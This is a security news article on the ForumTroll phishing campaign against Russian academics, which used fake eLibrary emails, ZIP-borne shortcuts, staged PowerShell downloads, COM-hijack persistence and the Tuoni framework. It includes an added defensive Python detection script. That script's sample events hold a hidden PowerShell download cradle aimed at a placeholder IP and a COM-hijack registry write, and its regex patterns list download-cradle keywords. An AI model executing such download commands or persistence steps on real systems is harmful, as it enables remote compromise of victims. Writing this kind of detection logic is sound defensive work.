New ForumTroll Phishing Attacks Target Russian Scholars via Fake eLibrary Emails

A new wave of phishing attacks linked to Operation ForumTroll has been observed targeting academic professionals in Russia, according to cybersecurity researchers at Kaspersky. The activity was detected in October 2025, marking a shift in the threat actor’s focus from organizations to individual scholars.

Security analysts noted that the campaign primarily targets experts in political science, international relations, and global economics who are affiliated with leading Russian universities and research institutions. Researcher Georgy Kucherin stated that this phase of the operation demonstrates a clear move toward highly personalized attacks against specific professionals.

Operation ForumTroll is known for conducting advanced phishing campaigns that previously abused a zero-day vulnerability in Google Chrome, tracked as CVE-2025-2783. That earlier activity was used to distribute the LeetAgent backdoor and a spyware implant called Dante. The latest campaign, however, relies more on social engineering and carefully prepared infrastructure.

The attack begins with deceptive emails pretending to originate from eLibrary, a well-known Russian scientific digital library. These messages are sent from the address support@e-library[.]wiki, a domain that was registered in March 2025, several months before the phishing activity began. According to analysts, this deliberate domain aging was intended to avoid the suspicion commonly associated with newly registered domains.

To further strengthen the deception, the attackers hosted a cloned version of the legitimate eLibrary website on the fake domain. The emails encourage recipients to click a link to download a plagiarism report. Once clicked, the victim receives a ZIP archive named using their full personal identity, including last name, first name, and patronymic.

These malicious download links are configured for single use only. Any attempt to access the same link again results in an error message in Russian stating that the download has failed. If the link is opened on a non-Windows system, the user is instructed to try again later on a Windows computer.

Inside the ZIP file is a Windows shortcut file. When executed, it launches a PowerShell script that retrieves and runs a secondary payload from a remote server. This payload then contacts another server to download a final-stage DLL, establishes persistence using COM hijacking, and displays a decoy PDF file to distract the victim.
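As an added illustration, not taken from Kaspersky's report, the Python below sketches how a defender might turn the chain above into detection rules over process-creation and registry-set events: explorer.exe spawning PowerShell with a download cradle or from an Explorer-extracted ZIP directory, and a per-user CLSID InprocServer32 value pointing at a DLL inside the user profile. The event fields, sample records, IP address and CLSIDs are constructed; the campaign's actual command lines and CLSIDs are not given on the page.

```python
import re

# Constructed Sysmon-style events (id 1 = process create, id 13 = registry value set);
# sample records written for this example, not data from the campaign.
SAMPLE_EVENTS = [
    # user opened a shortcut inside an Explorer-opened ZIP: explorer.exe -> powershell.exe
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'powershell.exe -w hidden -c "iwr http://198.51.100.7/s2 -OutFile $env:TEMP\s2.ps1"',
     "cwd": r"C:\Users\ivanov\AppData\Local\Temp\Temp1_Ivanov_Ivan_Ivanovich.zip"},
    # benign admin script launched from a console: same binary, different context
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"powershell.exe -File C:\scripts\inventory.ps1", "cwd": r"C:\scripts"},
    # per-user CLSID registration pointing at a DLL in the profile: COM hijack footprint
    {"id": 13, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\CLSID"
               r"\{01234567-89ab-cdef-0123-456789abcdef}\InprocServer32\(Default)",
     "details": r"C:\Users\ivanov\AppData\Roaming\upd\core.dll"},
    # machine-wide registration by an installer: expected, not flagged
    {"id": 13, "image": r"C:\Windows\System32\msiexec.exe",
     "target": r"HKLM\Software\Classes\CLSID\{fedcba98-7654-3210-fedc-ba9876543210}\InprocServer32\(Default)",
     "details": r"C:\Program Files\Vendor\vendor.dll"},
]

# Generic PowerShell download-cradle keywords (assumed indicators, not the campaign's own).
DOWNLOAD_CRADLE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b", re.I)
# Explorer extracts files opened from inside a ZIP to %TEMP%\Temp<N>_<archive>.zip\
EXPLORER_ZIP_TEMP = re.compile(r"\\AppData\\Local\\Temp\\Temp\d*_[^\\]+\.zip(\\|$)", re.I)
# Per-user CLSID InprocServer32 values shadow HKLM registrations: the COM hijacking location.
USER_COM_INPROC = re.compile(r"^HKU\\[^\\]+\\Software\\Classes\\CLSID\\\{[0-9a-f-]{36}\}\\InprocServer32\\", re.I)
USER_WRITABLE_DLL = re.compile(r"^C:\\Users\\.+\.dll$", re.I)


def flag_event(ev):
    """Return a reason if the event fits the LNK -> PowerShell -> COM-hijack chain, else None."""
    if ev["id"] == 1:
        child_is_ps = ev["image"].lower().endswith("\\powershell.exe")
        parent_is_explorer = ev["parent"].lower().endswith("\\explorer.exe")
        if child_is_ps and parent_is_explorer and (
                DOWNLOAD_CRADLE.search(ev["cmd"]) or EXPLORER_ZIP_TEMP.search(ev["cwd"])):
            return "explorer-spawned PowerShell with download cradle or ZIP temp cwd (LNK-in-ZIP pattern)"
    elif ev["id"] == 13:
        if USER_COM_INPROC.search(ev["target"]) and USER_WRITABLE_DLL.search(ev["details"]):
            return "per-user CLSID InprocServer32 pointing at a user-writable DLL (COM hijack persistence)"
    return None


def flag_events(events):
    """Return (index, reason) pairs for every event that matches a rule."""
    return [(i, reason) for i, ev in enumerate(events) if (reason := flag_event(ev))]
```

Run against SAMPLE_EVENTS, flag_events returns hits for the explorer-spawned PowerShell and the per-user CLSID write only; tune the keyword list and path patterns to the telemetry source actually in use.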

The final stage of the infection deploys Tuoni, a command-and-control and red-teaming framework that grants attackers full remote access to the compromised Windows system. According to Kaspersky, ForumTroll has been active against organizations and individuals in Russia and Belarus since at least 2022, suggesting the group is likely to continue its operations in the region.

In a related development, Positive Technologies reported on two additional threat clusters known as QuietCrabs and Thor. QuietCrabs, believed to be linked to China and also tracked as UTA0178 and UNC5221, exploits vulnerabilities in products such as Microsoft SharePoint and Ivanti solutions to deploy web shells and loaders that ultimately install the Sliver implant.

Meanwhile, the Thor group, first observed in 2025 attacks against Russian companies, has been associated with ransomware operations. Researchers reported the use of LockBit and Babuk ransomware, along with remote management tools, to maintain long-term access to compromised environments.
